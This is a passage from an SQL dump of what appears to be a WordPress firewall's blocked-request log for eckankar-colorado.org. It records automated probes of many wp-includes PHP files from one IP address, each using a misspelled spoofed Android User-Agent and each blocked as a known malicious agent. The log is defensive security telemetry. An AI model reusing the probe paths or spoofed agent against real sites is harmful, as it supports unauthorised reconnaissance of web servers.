User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbGliL3BocDcyY29tcGF0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133771,1699930556.044357,1699930556.035700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-server.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItc2VydmVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133772,1699930552.464034,1699930552.455400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-request.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItcmVxdWVzdC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133899,1699931588.326332,1699931588.304300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/css/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Nzcy93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133829,1699930823.956207,1699930823.947500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Category.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYXRlZ29yeS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133773,1699930544.844617,1699930544.835800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-message.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItbWVzc2FnZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133774,1699930537.306673,1699930537.292100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-introspectionserver.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItaW50cm9zcGVjdGlvbnNlcnZlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133775,1699930533.507096,1699930533.498400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-error.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItZXJyb3IucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133828,1699930835.143473,1699930835.134600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Copyright.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Db3B5cmlnaHQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133776,1699930528.528355,1699930528.519600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-date.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItZGF0ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133777,1699930523.570059,1699930523.561200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-clientmulticall.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItY2xpZW50bXVsdGljYWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133778,1699930517.468943,1699930517.460100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-client.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItY2xpZW50LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133827,1699930839.284747,1699930839.276000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Core.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Db3JlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133779,1699930746.505893,1699930746.496700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133900,1699931552.688306,1699931552.678900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wpdb.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133780,1699930742.721117,1699930742.712300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Author.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9BdXRob3IucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133826,1699930847.158964,1699930847.150200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Credit.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DcmVkaXQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133781,1699930736.972246,1699930736.950600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133782,1699930722.344615,1699930722.335900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Transport.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9UcmFuc3BvcnQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133783,1699930716.933528,1699930716.924900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Ssl.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9Tc2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133825,1699930857.580371,1699930857.571600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Enclosure.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9FbmNsb3N1cmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133784,1699930714.395693,1699930714.383200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Session.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9TZXNzaW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133785,1699930708.351098,1699930708.342400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Response.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9SZXNwb25zZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133786,1699930702.406752,1699930702.398100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Requests.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9SZXF1ZXN0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133959,1699932232.801532,1699932232.786700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2VuZHBvaW50cy9jbGFzcy13cC1yZXN0LWJsb2NrLWRpcmVjdG9yeS1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133901,1699931547.581861,1699931547.567700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133824,1699930864.594462,1699930864.585700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Exception.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 